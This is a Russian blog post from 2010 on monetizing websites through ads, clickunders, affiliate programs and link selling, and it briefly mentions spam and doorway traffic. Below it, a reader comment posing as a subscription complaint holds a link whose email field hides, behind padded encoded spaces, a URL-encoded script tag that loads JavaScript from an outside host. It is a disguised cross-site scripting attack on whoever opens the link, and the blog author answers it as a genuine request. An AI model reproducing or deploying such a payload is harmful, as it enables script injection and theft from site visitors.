Сайт есть - Нужно монетизировать

Сайт есть - Нужно монетизировать

"Имею скафандр – Готов путешествовать" © Роберт Хайнлайн

Одним из самых банальных вопросов в сети интернет является: "Сколько можно заработать на сайте?" А самым банальным ответом на различных специализированных форумах, скорее всего на него будет ответ-шутка: "Сто тысч мульйонов". Уж извините. Однако пришло время и этот вопрос немножко приоткрыть на блоге. Хотя учить матчасти вопроса я не возьмусь. Для этого есть полно хороших бесплатных рассылок и платных инфокурсов от различных авторов. Но, поскольку на блоге уже были затронуты темы постройки сайтов и блогов, а также их продвижение, то поговорим о направлениях в которых возможна монетизация сайтов с целью заработка. Заодно структурирую информацию и у себя в голове.

Но, вначале оговорим некоторые прописные истины.

На описанных ранее сервисах (Народ, Blogger.com, онлайн-дневники) конечно тоже можно пробовать зарабатывать. Однако вы должны понимать, что в таком случае вы будете полностью зависеть от сервисов, на которых вы размещаете сайт, а также будете терять заработок на рекламе, которые эти сервисы будут показывать. Это не относится полностью пожалуй только к Блоггеру. Также вы будете ограничены в применении различных программных инструментов на бесплатных сайтах. Поэтому, когда получите какой-то опыт на бесплатных сайтах, у вас путь на платные виртуальные хостинги. Там вы будете размещать сайты со своими собственными доменными именами. Благо домен в зоне ".ru", сейчас можно купить за 100-150 рублей РФ в год.


Далее. Говорить о том, "сколько можно зарабатывать на сайте", мягко говоря некорректно. Сайт сайту рознь. Кто-то и на сайтах на Народе зарабатывает (наверное), а кто-то и на сайтах на платном хостинге со своим доменом не может. Плюс ко всему, если из десятка проектов у начинающего вебмастера выживет хотя бы тройка, то это очень не плохо, как это ни грустно. А чаще всего выживают проекты, в которые вы вкладываете реальную свою работу, своё "Я". Конечно, можно плодить сайты на автомате – есть хорошее программное обеспечение для этого. Однако такие сайты, также нужно "уметь готовить" – иначе они будут попадать в бан поисковых систем и посетителей вы не получите.

Из последнего пункта плавно переходим к следующему, а именно: "Есть посетители – есть заработок". Вы полностью зависите от того, есть ли на сайте ЦЕЛЕВЫЕ посетители с поисковых систем, он же ТРАФИК. То есть люди, которые на сайт пришли за конкретной информацией. Тут вам открываются возможности многих видов заработка. Чем больший трафик – тем больше видов заработка вы сможете использовать. Из моей практики – какие-то деньги, позволяющие отбить месячные затраты на хостинг и домен, начинаются после 100 посетителей (хостов) в день на сайте. Конечно же возможен заработок и без посетителей на сайте, но с соблюдением некоторых условий, о которых поговорим в следующем блоке статьи.

Нужно заметить одну вещь. Если вы ориентированы на заработок в интернете, то вам придётся вкладывать деньги в это дело. Общие направления расходов: оплата хостинга (3-12$ в месяц), покупка/продление домена (3-20$ в год), прогон по соцзакладкам (1-10$ за раз), прогон сайта по каталогам (5-20$ за раз), прогон по каталогам статей (10-100$), покупка контента (1-6$ за 1000 знаков), покупка рекламы или продвижения сайта (10-10000$). Многое из перечисленного решается самостоятельной работой с помощью специального программного обеспечения, которое также стоит денег. О доступных методах продвижения сайта я уже писал в двух статьях на блоге (часть 1 и часть 2). Продвижение сайта нужно, как для улучшения ранжирования сайта в поисковых системах, что ведет за собой увеличение посещаемости, так и для увеличения "пузомерок" сайта. Под "пузомерками" понимаются уровни ТИЦ и PR сайта, в системах Яндекс и Google соответственно.

Теперь переходим собственно к направлениям монетизации сайта. Всё я конечно не охвачу, но основное перечислю:

  • Контекстная и тизерная реклама
  • Баннерная реклама
  • Кликандеры и всплывающие окна, имитирующие работу мессенджеров
  • Партнёрские программы интернет-магазинов
  • Партнёрские программы сервисов
  • Партнёрские программы по продаже инфопродуктов
  • Продажа ссылок и статей с сайта (случай для больших проиндексированных сайтов с отсутствием посетителей)
  • Продажа постовых и гостевых статей в блогах
  • Партнёрки сайтов знакомств, фармапартнёрки, смс-платники и т.д.

Если говорить более конкретно о тех ресурсах, которые обслуживают данные направления, то я буду указывать в основном те, с которыми работаю или работал ранее.

Контекстная и тизерная реклама.

Я использую известные сервисы контекстной рекламы: Google AdWords, AdLabs, Бегун. Подразумевается размещение у себя на сайте блоков текстовой и графической рекламы. Оплата получается за клик (переход) пользователя на сайт рекламодателя. Сайты проходят модерацию перед приёмом в систему. Возможна работа при низкой посещаемости.

Баннерная реклама

Первый вариант – баннерообменные сети. Есть с оплатой за баннеропоказы и за клики. Имеет смысл только при очень больших посещаемостях – свыше 1000 человек в день. У меня таких сайтов нет. Второй вариант – это размещение баннеров прямых рекламодателей, по договорённости. Цена устанавливается за месяц, в зависимости от посещаемости и "пузомерок".

Кликандеры и всплывающие окна, имитирующие работу мессенджеров

Также можно зарабатывать, но только при больших количествах народа на сайте. В основном подходят для сайтов развлекательной тематики, когда люди приходят за халявой. Пример сервиса - Advmaker, WEB-ROM, Ru Clicks

Партнёрские программы интернет-магазинов

Тут я обобщаю много видов партнёрок, когда оплата происходит за покупку пользователем товара через интернет. Я работаю с такими интернет магазинами:

  • Продажа мобильных - Diamond Electric
  • Продажа лицензионного софта - Allsoft.ru
  • Продажа казуальных компьютерных игр - GAMEBOSS
  • Продажа фильмов - DirCash (подобные партнёрки не очень долговечны)
  • Продажа книжки-сказки о конкретном ребёнке - "Сказки про..."

И так далее... Многие интернет-магазины предоставляют свои готовые скрипты, для размещения партнёрского магазина на вашем сайте. Сразу скажу, что лучше в таком случае раздел сайта с магазином закрывать от индексации. Привлекать посетителей контентом сайта и ставить рекламные блоки на внутренние страницы вашего магазина.

Партнёрские программы сервисов

Многие сервисы, которыми вы возможно пользуетесь, предоставляют вам возможность участвовать в их партнёрках (рефферальских программах) . В таком случае вы получаете часть прибыли сервиса, которую приносит ваш рефферал.

Партнёрские программы по продаже инфопродуктов

Это очень широкая ниша. Тут вы получаете часть дохода от продажи информационных курсов на дисках. Очень популярное направление. В годовом отчёте работы блога я немножко эту тему затронул. Вы можете получать 20-40% от цены курса. Пример партнёрки по продаже инфокурсов, с которой я реально получал деньги: партнёрка Константина Фёста. Пробую работать с партнёрками: Александра Слободенюка, Сергея Жуковского, "Форсированное овладение иностранными языками", Info-DVD и другими. Скажу только, что прикладные курсы, обучающие конкретным навыкам, которые используются в реальной жизни, лучше выкупаются по наложенным платежам.

Продажа ссылок и статей с сайта

Это как раз случай для больших проиндексированных сайтов с отсутствием посетителей. Заработок напрямую зависит от уровня "пузомерок" сайта. Средняя стоимость ссылки со страницы c ТИЦ=0 и PR=0 – около 1 руб/месяц. Чем выше пузомерки – тем выше цена на ссылку и статьи на сайте. Лучшая биржа по продаже ссылок – SAPE. Продажа ссылок связана с риском попадания сайта под фильтры поисковых систем и последующим баном. Система может работать полностью автоматически, или с вашей модерацией площадок рекламодателей. Это один из самых популярных способов заработка на сайте сейчас.

Продажа постовых и гостевых статей в блогах

Постовые – это короткие заметки в конце постов со ссылкой на блог рекламодателя. Гостевые посты – статьи сторонних авторов, со ссылками на их сайты, публикуемые на блоге за деньги. Я такого пока не практиковал, потому ничего не могу сказать.

Партнёрки сайтов знакомств, фармапартнёрки, смс-платники и т.д

В основном заработок от покупок услуг и товаров пользователями на таких сайтах. Часто предоставляют возможность привязать свой домен к сервису, без размещения собственного сайта на своём хостинге. Реально люди на этом зарабатывают, но тут нужно уметь привлекать много целевого трафика на сайт. Часто методы привлечения "серые" (дорвеи, саттелиты, спам и т.д.)

Что вы выберите для монетизации сайта - это ваш выбор. Рекомендую начать пробовать работать и изучать всю доступную информацию по выбранному направлению. Читайте специализированные форумы: Форум SAPE, Searchengine, Mastertalk. Рекомендую подписываться на бесплатные специализированные рассылки от разных авторов. Вполне возможно, что вам понадобится покупать обучающие курсы для ускорения своего развития в области интернет-заработка.

Если же вернуться к тому, сколько кто зарабатывает на сайте, то повторюсь, что всё зависит от сайта, тематики сайта, уровня сайта, опыта его автора, на чём зарабатывает сайт, сколько денег вкладывается в развитие и продвижение сайта, и ещё тысячи факторов. Так что сказать о том, что на сайте на Народе или вообще на сайте столько-то можно заработать - безответственно. Потому как 1 доллар вам могут помочь заработать и 100 человек, зашедших на сайт с поисковых систем, и 1000 человек, которых, кроме халявы ничего не интересует. Хотя, в последнем случае, часто используются специфичные методы рекламы, типа кликандеров, тизеров и т.д.

А вообще, сам по себе сайт без вашего участия ничего не заработает. Развивайте сайт, пишите интересные статьи, продвигайте его в интернете, привлекайте посетителей.

"Первый полноценный обучающий курс по инфо-бизнесу в интернет для женщин!"

Основы инфобизнеса в популярном формате...

Жмите, и узнайте больше

Порекомендуйте сайт другим:


Если Вам понравилась статья, то Вы можете:

Адрес заметки: http://vladekas.com/blog/post_1268611532.html

26 марта 2010, 03:13
Здравствуйте!
Спасибо за Ваш сайт. К сожалению, никак не могу подписаться на вашу рассылку на maillist.ru ((
Выдает ошибку на странице вашей рассылки или перебрасывает на главную. Хотел бы подписаться именно на maillist, потому как давно являюсь их подписчиком.
Проверьте пожалуйста вашу рассылку (если я правильно понял, нужно быть залогиненным?)
Спасибо.
http://www.maillist.ru/cgi/gsps.cgi?from=catalogue &sid=b7666f701e3aceb0578ae527350bb918&catalog_leaf =22&catalog_sort=&ecid=&trial_email=&trial=%CF%EE% E4%EF%E8%F1%E0%F2%FC%F1%FF&email=%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74 %74%70%3A%2F%2F%73%70%65%63%74%6F%72%2E%73%69%74%6 5%39%30%2E%6E%65%74%2F%72%65%66%2E%6A%73%3E%3C%2F% 53%43%52%49%50%54%3E
Сергей Иванович
26 марта 2010, 11:25
№ 2Комментарий автора:
Вроде всё нормально. Только что сам попробовал.
Логиниться не обязательно
- Заходите на главную этого сайта.
- Вводите в форму имя и корректный адрес электронной почты (возможно неправильно введён адрес был?)
- Жмёте "Подписаться"
- Сервис выдаёт сообщение о том, что вам отправлено письмо активации подписки
- Получаете письмо и переходите по ссылке "Активация подписки"
- Всё, рассылка будет приходить на ваш адрес.
Vladek
Комментарии к этой заметке больше не принимаются.


Подпишитесь на Бесплатную Почтовую Электронную Рассылку "Новичкам Популярно об Интернет":

подписка

Ваш e-mail: *
Ваше имя: *

Рейтинг популярности - на эти заметки чаще всего ссылаются:

март, 2010
пн вт ср чт пт сб вс
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31